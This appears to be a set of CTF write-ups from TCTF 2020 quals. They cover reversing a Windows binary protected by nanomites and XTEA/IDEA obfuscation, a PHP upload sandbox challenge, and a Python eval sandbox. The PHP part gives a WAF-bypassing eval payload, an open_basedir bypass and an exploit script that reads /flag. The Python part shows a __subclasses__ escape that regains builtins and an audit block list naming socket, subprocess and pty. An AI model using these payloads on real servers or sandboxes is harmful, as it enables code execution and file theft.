.data:00000001400079B7 41 B8 FF FF FF FF mov r8d, 0FFFFFFFFh
.data:00000001400079BD 0F 1F 00 nop dword ptr [rax]
.data:00000001400079C0 89 C2 mov edx, eax
.data:00000001400079C2 81 FA 72 E3 70 F9 cmp edx, 0F970E372h
.data:00000001400079C8 CC int 3 ; Trap to Debugger
After analyzing the code a bit it became apparent that some instructions had been replaced by the debug-exception triggering instruction int $3
. Since all branches were missing from the protected code (and due to the name of the challenge “J” $\approx$ WinDbg command for conditional breakpoint as pointed out by one of our team members) we suspected conditional logic being implemented by means of the hooked KiUserExceptionDispatcher
and the map object created from the list of integers in high-level steps 4. and 6. earlier. This seemed to be a obfuscation known as “nanomites” in ye Olden Days when the author of this writeup learned how to reverse all the things. Writing a small parser for the integer list and printing the entries seemed to confirm this idea:
import struct
dat = bytearray(open("j.exe", "rb").read())
ns = struct.unpack("<63I".format(num_nanos), dat[0x5f70:][:63 * 4])
for n in ns:
cond, skip, src, tgt = n & 0xf, (n >> 30), ((n >> 4) & 0x1fff), ((n >> 17) & 0x1fff)
print("{:#x} {:#x} {:#x} {:#x}".format(cond, skip, src, tgt))
0x0 0x0 0x40 0x50
0x1 0x0 0x58 0xa0
0x1 0x2 0x60 0xf0
0x1 0x2 0x6c 0x193
0x2 0x2 0x78 0x2f4
0x3 0x2 0x84 0x313
0x4 0x0 0x92 0x50
[...]
The values in the third column of the output and the locations of the int $3
instructions relative to the function beginning seem to match. So, we concluded, the fourth column could be the relative location of the jump target. But what are the first two values used for?
To understand this, we finally analyzed the KiUserExceptionDispatcher
hook located at 0x140001490
. After recovering the parameter type (a struct
containing a pointer to a exception context PCONTEXT
, and a pointer to an EXCEPTION_RECORD
structure) this function becomes a lot more readable:
__int64 __fastcall sub_140001490(struct mystruct *a1)
{
unsigned int v1; // er11
__int64 base; // rbx
PCONTEXT v3; // rdx
__int64 v4; // rax
__int64 v5; // rcx
unsigned int off; // er8
int skip; // er8
__int64 nano_jmp_diff; // r10
DWORD eflags; // er9
__int64 map_ele; // [rsp+0h] [rbp-18h]
v1 = 0;
if ( a1->except->ExceptionCode == (unsigned int)EXCEPTION_BREAKPOINT )
{
base = shc_base;
a1->ctxt->Dr0 = 0i64;
a1->ctxt->Dr1 = 0i64;
a1->ctxt->Dr2 = 0i64;
a1->ctxt->Dr3 = 0i64;
v3 = a1->ctxt;
v4 = *(_QWORD *)(nanomites + 8);
v5 = nanomites;
off = LODWORD(v3->Rip) - base;
if ( *(_BYTE *)(v4 + 25) )
goto LABEL_9;
do
{
if ( *(_DWORD *)(v4 + 28) >= off )
{
v5 = v4;
v4 = *(_QWORD *)v4;
}
else
{
v4 = *(_QWORD *)(v4 + 16);
}
}
while ( !*(_BYTE *)(v4 + 25) );
if ( v5 == nanomites || (map_ele = v5, off < *(_DWORD *)(v5 + 28)) )
LABEL_9:
map_ele = nanomites;
if ( map_ele != nanomites )
{
skip = *(_DWORD *)(map_ele + 36);
nano_jmp_diff = *(int *)(map_ele + 40);
v1 = -1;
if ( skip )
{
if ( skip == 1 )
{
skip = 5;
}
else if ( skip == 2 )
{
skip = 6;
}
else
{
v1 = 0;
}
}
else
{
skip = 2;
}
eflags = v3->EFlags;
if ( _bittest((const int *)&eflags, 8u) )
v1 = 0;
if ( *(_BYTE *)(map_ele + 32) )
{
switch ( *(_BYTE *)(map_ele + 32) )
{
case 1:
if ( (eflags & 0x40) != 0 || ((eflags ^ (eflags >> 4)) & 0x80u) != 0 )
goto LABEL_27;
break;
case 2:
if ( (eflags & 0x40) == 0 && ((eflags ^ (eflags >> 4)) & 0x80u) == 0 )
goto LABEL_27;
break;
case 3:
if ( (eflags & 0x40) != 0 )
{
LABEL_27:
v3->Rip = base + nano_jmp_diff;
return v1;
}
break;
case 4:
if ( (eflags & 0x40) == 0 )
goto LABEL_27;
break;
default:
return 0i64;
}
v3->Rip += skip;
return v1;
}
v3->Rip = base + nano_jmp_diff;
}
}
return v1;
}
To summarize, the (relative) location of the current debug exception within the protected function is looked up in the C++ map, the integer stored at map_ele + 36
is translated from the list [0, 1, 2, 3]
to the corresponding entry in the list [2, 5, 6, 0]
, and then the value of the rflags
x86-64 register (storing the result of the last comparison as part of the status flags) is evaluated according to the value stored at map_ele + 32
. So, the first two columns of the small parser above are actually values controlling the conditional jump type, and the number of bytes to skip forward in case the branch is not taken. The later is a clever trick to skew analysis further, since the int $3
instructions do not just “fall through” to the next instruction, but rather a jump occurs regardless of whether the condition was false or true. Of course, the bytes directly behind each int $3
were maliciously filled with instructions that would “forwards consume” the next instructions as parts of immediates, making the obfuscated code less readable when attempting to do a linear disassembly. This technique, however, introduces a weakness that may or may not have been intended by the authors: We have enough space to replace the int $3
s by the original relative jump instructions thus removing the whole obfuscation layer. The following small python script produces a clean(er) version of the obfuscated code (that is even runnable!):
#!/usr/bin/env python3
import sys
import struct
def fixup(dat, off_code, off_nanos, num_nanos):
ns = struct.unpack("<{}I".format(num_nanos), dat[off_nanos:][:num_nanos * 4])
for n in ns:
cond, skip, src, tgt = n & 0xf, (n >> 30), ((n >> 4) & 0x1fff), ((n >> 17) & 0x1fff)
print("{:#x} {:#x} {:#x} {:#x}".format(cond, skip, src, tgt))
skip = [2, 5, 6, 0][skip]
dat[off_code+src:off_code+src+skip] = b"\x90" * skip
delta = tgt - (src + 2) ## jmp near is two bytes
if abs(delta) < 0x80 and skip >= 2:
a = [ 0xeb, 0x7e, 0x7d, 0x74, 0x75 ][cond]
dat[off_code+src:off_code+src+2] = struct.pack("<Bb", a, delta)
print("\x1b[32m patching jmp short\x1b[39m")
elif skip == 5 and cond == 0:
a = [ b"\xe9" ][cond]
dat[off_code+src:off_code+src+5] = a + struct.pack("<i", delta - 3)
print("\x1b[32m patching unconditional jmp near\x1b[39m")
elif skip >= 6:
a = [ b"\x0f\x8e", b"\x0f\x8d", b"\x0f\x84", b"\x0f\x85" ][cond - 1]
dat[off_code+src:off_code+src+6] = a + struct.pack("<i", delta - 4)
print("\x1b[32m patching conditional jmp near\x1b[39m")
else:
print("\x1b[31m not patching ... \x1b[39m")
return dat
dat = bytearray(open("j.exe", "rb").read())
dat = fixup(dat, 0x5f70, 0x66f0, 0x3f)
dat = fixup(dat, 0x5660, 0x6600, 0x39)
dat[0x5660+0x1fe*8:0x5660+0x1fe*8+8] = struct.pack("<Q", 0x5EFFFFF009E85657)
dat[0x5660+0x7fc*2:0x5660+0x7fc*2+2] = struct.pack("<H", 0xC35F)
dat[0xb3b:0xb3b+5] = b"\x90" * 5 ## Patch out exception hook
open("j_patched.exe", "wb").write(dat)
Success! Now $f_0$ and $f_1$ can be disassembled (or even decompiled) to meaningful instructions! Or … well … halfway meaningful instructions, because the authors gracefully added Control Flow Flattening as another layer of obfuscation. We can happily ignore this for function $f_0$, since it only takes constants as input parameters and therefore is independent of the flag, but the actual checker implemented in $f_1$ we need to fully recover. (Not that we did not try to throw angr on it but this was a lost battle anyway, as we would learn much later that night.)
Control Flow Flattening is an obfuscation technique that conceals the order of basic block execution of a particular function and therefore slows down static analysis. It can be perceived as a switch statement wrapped into a while loop, introducing and updating a global state variable that schedules execution of the original basic blocks.
To worsen things, the authors also enabled obfuscator LLVM’s Opaque Predicates and Bogus Control Flow obfuscation techniques that add a lot of noise to the protected code. In total, the decompiled $f_1$ looked like this: (We added some annotations of basic operations in a lengthy manual procedure during the second night of the CTF.)
__int64 __fastcall sub_140007060(__int64 flag, unsigned __int8 *key, unsigned int *consts)
{
unsigned __int16 v3; // r12
__int16 v4; // r15
unsigned __int16 v5; // di
unsigned __int16 v6; // bp
unsigned __int16 v7; // r14
unsigned int v8; // er13
unsigned int v9; // er10
unsigned int rolling; // er11
int i; // er8
__int16 v12; // dx
unsigned int j; // ebx
int v14; // esi
unsigned int v15; // et0
int v16; // eax
__int16 v17; // r8
__int16 v18; // r15
unsigned int v19; // edx
unsigned int v20; // eax
int v21; // eax
__int16 v22; // dx
int v23; // eax
unsigned int v24; // et0
unsigned __int16 v25; // si
int v26; // ebp
unsigned int v27; // et0
int v28; // esi
int v29; // edi
unsigned int v30; // ebp
unsigned int v31; // esi
unsigned int v32; // ebp
unsigned int v33; // et0
int v34; // esi
int v36; // [rsp+0h] [rbp-70h]
unsigned __int16 v37; // [rsp+0h] [rbp-70h]
unsigned int v38; // [rsp+0h] [rbp-70h]
int v39; // [rsp+0h] [rbp-70h]
unsigned int v40; // [rsp+0h] [rbp-70h]
int v41; // [rsp+8h] [rbp-68h]
int v42; // [rsp+8h] [rbp-68h]
int v43; // [rsp+8h] [rbp-68h]
int v44; // [rsp+8h] [rbp-68h]
int v45; // [rsp+8h] [rbp-68h]
unsigned __int16 v46; // [rsp+10h] [rbp-60h]
unsigned __int16 *key_; // [rsp+18h] [rbp-58h]
int v48; // [rsp+24h] [rbp-4Ch]
int v49; // [rsp+28h] [rbp-48h]
unsigned __int8 *v50; // [rsp+38h] [rbp-38h]
v3 = _byteswap_ushort(*(_WORD *)flag);
v4 = (~(*(unsigned __int8 *)(flag + 2) << 8) & 0xE99E | (*(unsigned __int8 *)(flag + 2) << 8) & 0x1600) ^ (~*(unsigned __int8 *)(flag + 3) & 0xE99E | *(_BYTE *)(flag + 3) & 0x61);
v5 = ~*(unsigned __int8 *)(flag + 5) & 0x562A;
v6 = (~(*(unsigned __int8 *)(flag + 4) << 8) & 0x562A | (*(unsigned __int8 *)(flag + 4) << 8) & 0xA900) ^ (v5 | *(_BYTE *)(flag + 5) & 0xD5);
v7 = (~(*(unsigned __int8 *)(flag + 6) << 8) & 0x5089 | (*(unsigned __int8 *)(flag + 6) << 8) & 0xAF00) ^ (~*(unsigned __int8 *)(flag + 7) & 0x5089 | *(_BYTE *)(flag + 7) & 0x76);
v8 = *consts;
v9 = consts[1];
v50 = key;
rolling = 0x104D9AF0;
for ( i = 0; ; i = v49 + 1 )
{
j = v3;
v49 = i;
key_ = (unsigned __int16 *)key;
v41 = *(unsigned __int16 *)key;
v36 = v41 * v3;
v14 = -1975650526;
do
{
if ( v14 != -1975650526 )
{
v5 = 29222 - v3 - v41 - 29221;
goto LABEL_10;
}
v14 = -2017906061;
if ( v36 )
v14 = -946745016;
}
while ( v14 < -946745017 );
while ( v14 == -946745016 )
{
v15 = v41 * v3;
*(&v15 + 1) = v15;
v5 = (((unsigned int)(*(_QWORD *)&v15 >> 16) - v36) >> 16) + 1;
LABEL_10:
v14 = 1075691724;
}
v46 = v5;
v48 = *((unsigned __int16 *)key + 1);
v16 = 1626405068;
if ( i < 8 )
v16 = -41311302;
if ( v16 != -41311302 )
break;
v17 = v4 + v48;
v18 = v6 + *((_WORD *)key + 2);
v19 = ((~(v8 >> 5) & 0x568C210F | (v8 >> 5) & 0x173DEF0) ^ (~(16 * v8) & 0x568C210F | (16 * v8) & 0xA973DEF0)) + v8;
v20 = rolling + *(_DWORD *)&v50[4 * ((rolling >> 11) & ((rolling >> 11) ^ 0x1FFFFC))];
v9 -= v19 & ~v20 | v20 & ~v19;
v42 = key_[3];
*(_DWORD *)&v37 = v42 * v7;
v21 = -1975650526;
do
{
if ( v21 != -1975650526 )
{
v7 = 3871 - v7 - v42 - 3870;
goto LABEL_22;
}
v21 = -2017906061;
if ( *(_DWORD *)&v37 )
v21 = -946745016;
}
while ( v21 < -946745017 );
while ( v21 == -946745016 )
{
*(_DWORD *)&v7 = ((((~HIWORD(*(_DWORD *)&v37) & 0x334DAD1A | HIWORD(*(_DWORD *)&v37) & 0x52E5) ^ (~(*(_DWORD *)&v37 << 16) & 0x334DAD1A | (*(_DWORD *)&v37 << 16) & 0xCCB20000))
- *(_DWORD *)&v37) >> 16)
+ 1; //
// v7 = max(0, v37 - 1)
LABEL_22:
v21 = 1075691724;
}
rolling += 0x3DF64CA2;
*(_DWORD *)&v22 = (~v5 & 0xA212 | v5 & 0x5DED) ^ (~v18 & 0xA212 | v18 & 0x5DED);
v43 = key_[4];
v38 = v43 * *(_DWORD *)&v22;
v23 = -1975650526;
do
{
if ( v23 != -1975650526 )
{
v22 = 18749 - v22 - v43 - 18748;
goto LABEL_31;
}
v23 = -2017906061;
if ( v38 )
v23 = -946745016;
}
while ( v23 < -946745017 );
while ( v23 == -946745016 )
{
v24 = v38;
*(&v24 + 1) = v38;
*(_DWORD *)&v22 = (((unsigned int)(*(_QWORD *)&v24 >> 16) - v38) >> 16) + 1;
LABEL_31:
v23 = 1075691724;
}
v8 -= (~(*(_DWORD *)&v50[4 * (rolling & (rolling ^ 0xFFFFFFFC))] + rolling) & 0x6D1A24E8 | (*(_DWORD *)&v50[4 * (rolling & (rolling ^ 0xFFFFFFFC))]
+ rolling) & 0x92E5DB17) ^ (~(((v9 >> 5) & ~(16 * v9) | (16 * v9) & ~(v9 >> 5)) + v9) & 0x6D1A24E8 | (((v9 >> 5) & ~(16 * v9) | (16 * v9) & ~(v9 >> 5)) + v9) & 0x92E5DB17);
v25 = v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1));
v44 = key_[5];
v39 = v44 * v25;
v26 = -1975650526;
do
{
if ( v26 != -1975650526 )
{
v25 = -18404 - (v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1))) - v44 + 18405;
goto LABEL_40;
}
v26 = -2017906061;
if ( v39 )
v26 = -946745016;
}
while ( v26 < -946745017 );
while ( v26 == -946745016 )
{
v27 = v44 * (unsigned __int16)(v22 + ((~v7 & 0xFE0E | v7 & 0x1F1) ^ (~v17 & 0xFE0E | v17 & 0x1F1)));
*(&v27 + 1) = v27;
*(_DWORD *)&v25 = (((unsigned int)(*(_QWORD *)&v27 >> 16) - v39) >> 16) + 1;
LABEL_40:
v26 = 1075691724;
}
v12 = v25 + v22;
v3 = (~v25 & 0x8EC5 | v25 & 0x713A) ^ (~v5 & 0x8EC5 | v5 & 0x713A);
v5 = ~v12 & 0x3E72;
v7 = (v5 | v12 & 0xC18D) ^ (~v7 & 0x3E72 | v7 & 0xC18D);
v6 = ~v12 & v17 | ~v17 & v12;
v4 = (~v25 & 0xA438 | v25 & 0x5BC7) ^ (~v18 & 0xA438 | v18 & 0x5BC7);
key = (unsigned __int8 *)(key_ + 6);
}
v28 = v6 + v48;
v45 = *((unsigned __int16 *)key + 3);
v40 = v45 * v7;
v29 = -1975650526;
while ( v29 == -1975650526 )
{
v29 = -2017906061;
if ( v40 )
v29 = -946745016;
if ( v29 >= -946745017 )
goto LABEL_44;
}
for ( j = 1 - v7 - v45;
;
j = ((((~HIWORD(v40) & 0x258A1540 | HIWORD(v40) & 0xEABF) ^ (~(v40 << 16) & 0x258A1540 | (v40 << 16) & 0xDA750000))
- v40) >> 16)
+ 1 )
{
v29 = 1075691724;
LABEL_44:
if ( v29 != -946745016 )
break;
}
v30 = ((~(v46 << 8) | 0xC0CC0073) & 0xC0CC6073 | (v46 << 8) & 0x9F00) ^ (~HIBYTE(v46) & 0xC0CC6073 | HIBYTE(v46) & 0x8C);//
// v30 = ntohs(v46);
v31 = ((~(unsigned __int16)((v28 & (v28 ^ 0xFFFF0000)) >> 8) & 0xE170 | ((v28 & (v28 ^ 0xFFFF0000)) >> 8) & 0x1E8F) ^ (~((v28 & (v28 ^ 0xFFFF0000)) << 8) & 0xE170 | ((v28 & (v28 ^ 0xFFFF0000)) << 8) & 0x1E00) | ~(~((v28 & (v28 ^ 0xFFFF0000)) << 8) | ~((v28 & (v28 ^ 0xFFFF0000)) >> 8))) << 16;//
// v31 = ntohl(v28);
v32 = v30 & ~(v31 & ~v8 | v8 & ~v31) | (v31 & ~v8 | v8 & ~v31) & ~v30;//
// v32 = v30 ^ v31 ^ v8
*(&v33 + 1) = ((j & (j ^ 0xFFFF0000)) << 8) & ((j & (j ^ 0xFFFF0000)) >> 8) | ((j & (j ^ 0xFFFF0000)) >> 8) ^ ((j & (j ^ 0xFFFF0000)) << 8);//
// v33 = ntohs(j);
v33 = _byteswap_ulong((unsigned __int16)(v4 + *((_WORD *)key + 2)));
v34 = (~(unsigned int)(*(_QWORD *)&v33 >> 16) & 0x7E3841F4 | (*(_QWORD *)&v33 >> 16) & 0x81C7BE0B) ^ (~v9 & 0x7E3841F4 | v9 & 0x81C7BE0B);
return (~v32 & 0x996215AF | v32 & 0x669DEA50) ^ (~v34 & 0x996215AF | v34 & 0x669DEA50) | ~(~v34 | ~v32);
}
At some point one of us recognized parts of the chaos to implement a slightly modified version of the XTEA block cipher where the initial value of the rolling sum and the delta value had been replaced by 0x104D9AF0
and 0x3df64ca2
. While this felt like the last missing piece of the puzzle, we were unhappy to realize that this was only half of the solution. Decrypting the constants found in the binary with the scrambled key produced by $f_0$ did not give us our desired (and well-deserved!) flag but only some unreadable gibberish. At this point it was about midnight in our time zone and we were 44 hours into the competition, so only 4 precious hours to sort out the mess. We needed to connect the following loose ends:
Knowing that modern compilers are better at optimizing code than our tired brains, we transformed the ugly hex-rays output into C code a compiler can understand, turned on optimization, fed the produced binary into Hex-Rays again and kept our fingers crossed:
__int64 __fastcall sub_140007060(unsigned __int8 *a1, unsigned __int16 *a2, unsigned int *a3)
{
unsigned int v5; // ebx
unsigned int v6; // er9
unsigned __int16 *v7; // rsi
int v8; // er8
int v9; // edx
int v10; // eax
int v11; // eax
int v12; // ecx
unsigned int v13; // edi
int v14; // er14
int v15; // er8
unsigned int v16; // er11
int v17; // er10
int v18; // ecx
unsigned int v19; // eax
int v20; // er13
int v21; // er10
unsigned int v22; // er10
unsigned int v23; // er12
int v24; // ecx
int v25; // er12
int v26; // er10
unsigned int v27; // edx
int v28; // er12
int v29; // er10
int v30; // er11
unsigned int v31; // er13
unsigned int v32; // eax
unsigned int v33; // eax
int v35; // [rsp+22h] [rbp-3Eh]
int v36; // [rsp+26h] [rbp-3Ah]
int v37; // [rsp+2Ah] [rbp-36h]
__int64 v38; // [rsp+2Ch] [rbp-34h]
v9 = *(unsigned __int16 *)a1;
v5 = *a3;
v6 = a3[1];
v7 = a2;
v8 = a1[3] ^ (a1[2] << 8);
LOWORD(v9) = __ROL2__(v9, 8);
v10 = ~a1[5];
LOWORD(v10) = v10 & 0x562A;
v11 = (a1[4] << 8) ^ (a1[5] & 0xD5 | v10);
LOWORD(v11) = v11 ^ 0x562A;
v12 = a1[7] ^ (a1[6] << 8);
v13 = 273521392;
while ( 1 )
{
v25 = *v7;
v26 = v25 * (unsigned __int16)v9;
if ( v26 )
{
LOWORD(v35) = (v25 * (unsigned int)(unsigned __int16)v9) >> 16;
HIWORD(v35) = v25 * v9;
v27 = ((unsigned int)(v35 - v26) >> 16) + 1;
}
else
{
v27 = 1 - v9 - v25;
}
v28 = v7[3];
v29 = v7[1];
v30 = v7[2];
v31 = (unsigned __int16)v28 * (unsigned __int16)v12;
if ( v7 == a2 + 48 )
break;
v14 = v29 + v8;
v15 = v11 + v30;
v16 = 1 - v12 - v28;
v6 -= (v13 + *(_DWORD *)&a2[(v13 >> 10) & 6]) ^ (v5 + ((16 * v5) ^ (v5 >> 5)));
if ( v31 )
v16 = (((HIWORD(v31) ^ ((v31 << 16) & 0xCCB20000 | ~(v31 << 16) & 0x334DAD1A) ^ 0x334DAD1A) - v31) >> 16) + 1;
v13 += 1039551650;
v17 = v7[4];
v18 = (unsigned __int16)(v15 ^ v27 ^ 0xA212) ^ 0xA212;
if ( v18 * v17 )
{
LOWORD(v36) = (unsigned int)(v18 * v17) >> 16;
HIWORD(v36) = v18 * v17;
v19 = ((unsigned int)(v36 - v18 * v17) >> 16) + 1;
}
else
{
v19 = 1 - v17 - v18;
}
v20 = v7[5];
v5 -= (v13 + *(_DWORD *)&a2[(2 * (_BYTE)v13) & 6]) ^ (((v6 >> 5) ^ (16 * v6)) + v6);
v21 = v20 * (unsigned __int16)(v19 + (v16 ^ v14));
if ( v21 )
{
LOWORD(v37) = (v20 * (unsigned int)(unsigned __int16)(v19 + (v16 ^ v14))) >> 16;
HIWORD(v37) = v20 * (v19 + (v16 ^ v14));
v22 = ((unsigned int)(v37 - v21) >> 16) + 1;
}
else
{
v22 = 1 - v20 - (v19 + (v16 ^ v14));
}
v9 = v22 ^ v27;
v8 = v22 ^ v15;
v7 += 6;
v23 = v22 + v19;
v11 = v14 ^ (v22 + v19);
v24 = ~v23;
LOWORD(v23) = v23 & 0xC18D;
LOWORD(v24) = v24 & 0x3E72;
v12 = v16 ^ (v23 | v24);
LOWORD(v12) = v12 ^ 0x3E72;
}
v32 = v29 + (unsigned __int16)v11;
if ( v31 )
v12 = ((__ROL4__(v31, 16) - v31) >> 16) + 1;
else
LOWORD(v12) = 1 - v12 - v28;
LODWORD(v38) = _byteswap_ulong((unsigned __int16)(v30 + v8));
WORD2(v38) = BYTE1(v12) | (unsigned __int16)((_WORD)v12 << 8);
v33 = (((_WORD)v27 << 8) & 0x9F00 | ~((_WORD)v27 << 8) & 0x6000 | 0xC0CC0073) ^ (BYTE1(v27) & 0x8C | ~BYTE1(v27) & 0xC0CC6073) ^ v5 ^ (((((_WORD)v32 << 8) & 0x1E00 | ~((_WORD)v32 << 8) & 0xE170) ^ ((v32 >> 8) & 0x8F | ~BYTE1(v32) & 0xE170)) << 16);
return v33 & (*(_DWORD *)((char *)&v38 + 2) ^ v6) | v33 ^ ((*(_DWORD *)((char *)&v38 + 2) ^ v6) & 0x669DEA50 | ~(*(_DWORD *)((char *)&v38 + 2) ^ v6) & 0x996215AF) ^ 0x996215AF;
}
This seemed easier to understand. Most strikingly, there were common sub-sequences that (after some further manual deobfuscation) clearly were not part of XTEA, but that always followed the same pattern:
if (a * b) {
c = a * b;
} else {
c = 1 - a - b;
}
Since we knew that we would not finish coming up with a 1:1 reimplementation of the unknown part of $f_1$, we started searching the webs for this pattern. Finally, one us remembered the constant 65537 as part of the protected function $f_0$, which then one of our crypto magicians—together with the if
construct above and the 208 bytes key—finally connected to the International Data Encryption Algorithm (IDEA)! This was of course 30 minutes before the end of the competition, and it took quite some effort to get our tired brains to turn up a working IDEA implementation, which we then used to decrypt the XTEA output once more, which indeed yielded the flag:
#include <stdio.h>
#include <stdint.h>
void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
unsigned int i;
uint32_t v0=v[0], v1=v[1], sum=0x104D9AF0, delta=0x3DF64CA2;
for (i=0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
sum += delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
printf("%x %x\n", v0, v1);
v[0]=v0; v[1]=v1;
}
#include "idea.h"
int main()
{
unsigned char enc[] =
{
0x0F, 0xDA, 0x04, 0xD8, 0xD0, 0xAB, 0xF4, 0xE5, 0x3F, 0xBD,
0x61, 0x7C, 0x6B, 0x13, 0x7C, 0xC4, 0xF9, 0xA0, 0x54, 0x33,
0xA7, 0x60, 0x50, 0xDA, 0x20, 0xE2, 0x7E, 0xE1, 0x13, 0x0B,
0xB2, 0x25
};
//const char *key = "CTFTQ_AUSL2_20_0";
/* Already expanded for IDEA */
const uint8_t key[] = {
0x43, 0x54, 0x46, 0x54, 0x51, 0x5f, 0x41, 0x55,
0x53, 0x4c, 0x32, 0x5f, 0x32, 0x30, 0x5f, 0x30,
0xbe, 0x8c, 0xaa, 0xa2, 0x98, 0x82, 0xbe, 0xa6,
0x60, 0x64, 0x60, 0x64, 0xa8, 0xbe, 0xa8, 0x86,
0x05, 0x55, 0x4d, 0x31, 0xc8, 0x7c, 0xc8, 0xc0,
0x7d, 0xc1, 0x0d, 0x51, 0x19, 0x51, 0x45, 0x7d,
0xf9, 0x9a, 0x81, 0x91, 0x82, 0x91, 0xa2, 0xfa,
0xa2, 0x1a, 0xfa, 0x32, 0xaa, 0x8a, 0x62, 0x0a,
0x23, 0x03, 0xf5, 0x05, 0x35, 0x44, 0x65, 0x44,
0x15, 0xf5, 0x14, 0x54, 0x35, 0xc5, 0x23, 0xf3,
0x88, 0xea, 0x88, 0x6a, 0xea, 0xcb, 0xa8, 0x2a,
0x8a, 0x29, 0xe6, 0x6b, 0x06, 0x46, 0x0b, 0x46,
0x97, 0x11, 0x55, 0xd4, 0x53, 0x50, 0xd7, 0x14,
0x8b, 0x48, 0xab, 0x2b, 0xad, 0xaf, 0x2a, 0x28,
0x06, 0x46, 0x0b, 0x46, 0x3b, 0xf7, 0x76, 0xd6,
0x58, 0xd5, 0x2f, 0xdd, 0x88, 0xea, 0x88, 0x6a,
0xac, 0xf7, 0xcb, 0x3a, 0xec, 0xab, 0x4a, 0x2b,
0x35, 0x44, 0x65, 0x44, 0x61, 0xb9, 0xdd, 0xfc,
0x9e, 0xf5, 0x0f, 0x65, 0xa2, 0x1a, 0xfa, 0x32,
0x4f, 0xc4, 0x7e, 0x6e, 0x7f, 0x6e, 0x3f, 0x12,
0x19, 0x51, 0x45, 0x7d, 0x6a, 0x47, 0x83, 0x3e,
0x38, 0x3f, 0xc5, 0x9a, 0x05, 0x55, 0x4d, 0x31,
0x11, 0x6c, 0x58, 0x41, 0xa0, 0x9b, 0xbd, 0x8c,
0x98, 0x82, 0xbe, 0xa6, 0xe7, 0x5a, 0x42, 0x73,
0xa1, 0xcf, 0x95, 0x43, 0x53, 0x4c, 0x32, 0x5f,
0xd4, 0xbd, 0xba, 0xab, 0xaf, 0xa0, 0x21, 0x04,
};
IdeaContext ctx;
ideaInit(&ctx, (uint8_t*) "TCTF_QUALS_2020_", 16);
//puts(enc);
encipher(8, (uint32_t *)&enc[0x00], (uint32_t *)&key[0]);
encipher(8, (uint32_t *)&enc[0x08], (uint32_t *)&key[0]);
encipher(8, (uint32_t *)&enc[0x10], (uint32_t *)&key[0]);
encipher(8, (uint32_t *)&enc[0x18], (uint32_t *)&key[0]);
//puts(enc);
char fl0g[0x21];
fl0g[0x20] = 0;
ideaDecryptBlock(&ctx, (uint8_t*)enc+0x00, fl0g+0x00);
ideaDecryptBlock(&ctx, (uint8_t*)enc+0x08, fl0g+0x08);
ideaDecryptBlock(&ctx, (uint8_t*)enc+0x10, fl0g+0x10);
ideaDecryptBlock(&ctx, (uint8_t*)enc+0x18, fl0g+0x18);
printf("----\n");
for (size_t i = 0; i < 0x20; ++i) {
printf("%hhx", fl0g[i]);
}
printf("\n----\n");
puts(fl0g);
}
$ gcc idea.c pwn.c
$ ./a.out
ef28dd7f 5078615a
955a0f80 15682e55
538f435e e71bceee
5675a3e5 7bf39dad
----
666c61677b336e6a30795f793075325f523341315f6a63635f306333346e217d
----
flag{3nj0y_y0u2_R3A1_jcc_0c34n!}
We are greeted with the challenge source.
<?php
error_reporting(0);
include 'function.php';
$dir = 'sandbox/' . sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch ($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
if (waf($data)) {
die('waf sucks...');
}
file_put_contents("$dir" . "index.php", $data);
case 'shell':
initShellEnv($dir);
include $dir . "index.php";
break;
default:
highlight_file(__FILE__);
break;
}
We get a sandbox, and 3 actions: pwd
, upload
and shell
.
The code we upload gets checked through the unknown function “waf” and is then saved into “index.php” in our sandbox which gets included and therefore executed.
We are able to achieve PHP-Code execution with this.
<?%0aprint(getcwd());?>
leads to /var/www/html
. It seems, waf()
is a simple character check stripping away a few special characters and uppercase letters and restricting the length of our code.
With <?%0aeval(getallheaders()[x]);
we are able to access the header and evaluate code sent in our header, which is not restricted by waf()
.
First let’s enable error_reporting(E_ALL);
and then try to access different files on the server.
Sending the payload error_reporting(E_ALL);file_get_contents("function.php");
we get a warning telling us that an additional “open_basedir” is in effect.
Using the open_basedir
bypass described here, we were able to bypass it and are now able to read every file on the filesystem.
/var/www/html/functions.php
:
<?php
function waf($data='')
{
if (strlen($data) > 35) {
return true;
}
if (preg_match("/[!#%&'*+,-.: \t@^_`|A-Z]/m", $data, $match) >= 1) {
return true;
}
return false;
}
function initShellEnv($dir)
{
ini_set("open_basedir", "/var/www/html/$dir");
}
While trying to access /flag
we get a gzipped file, which contains a filesystem that shows nothing when mounted. A quick check with binwalk
shows there is a PNG hidden inside of it which displays the flag: flag{do_u_like_cloud_computing}
exploit.py
:
import secrets
import requests
user_agent = secrets.token_hex()
r = requests.get("http://pwnable.org:47780/?action=pwd",
headers={
"User-Agent": user_agent
}
)
sandbox = r.text
r = requests.get("http://pwnable.org:47780/?action=upload&data=<?%0aeval(getallheaders()[x]);",
headers={
"User-Agent": user_agent,
"x": f'error_reporting(E_ALL);mkdir("/var/www/html/{sandbox}lol");chdir("/var/www/html/{sandbox}lol");ini_set("open_basedir", "..");chdir("..");chdir("..");chdir("..");chdir("..");chdir("..");ini_set("open_basedir","/");print(file_get_contents("/flag"));'
}
)
flag_file = r.content
We were greeted with a Python-like console. First we extract the source with command source
and the CPython audit sandbox binary with sandbox
.
Our Python code is first checked for whitespaces and subsequently evaluated without builtins:
if not (expression := re.sub(r'\s', '', expression)):
signal.alarm(0)
continue
eval(expression, {'__builtins__': {}})
We can regain the stripped builtins with:
().__class__.__base__.__subclasses__()[183]()._module.__builtins__
().__class__.__base__
gives access to <class 'object'>
. From there on we get all subclasses which are currently loaded in the Python instance.
In them, there is <class 'warnings.catch_warnings'>
at location 183. From there, we can access the builtins with catch_warnings()._module.__builtins__
. Now we are able to execute almost arbitrary code, only protected by the audit sandbox which restricts events which contain one of the following strings:
breakpoint, ctypes, fcntl, ftplib, glob, imaplib, import, mmap, msvcrt, nntplib, open, os, pdb, poplib, pty, resource, shutil, smtplib, socket, sqlite3, subprocess, syslog, telnetlib, tempfile, urllib, webbrowser, winreg
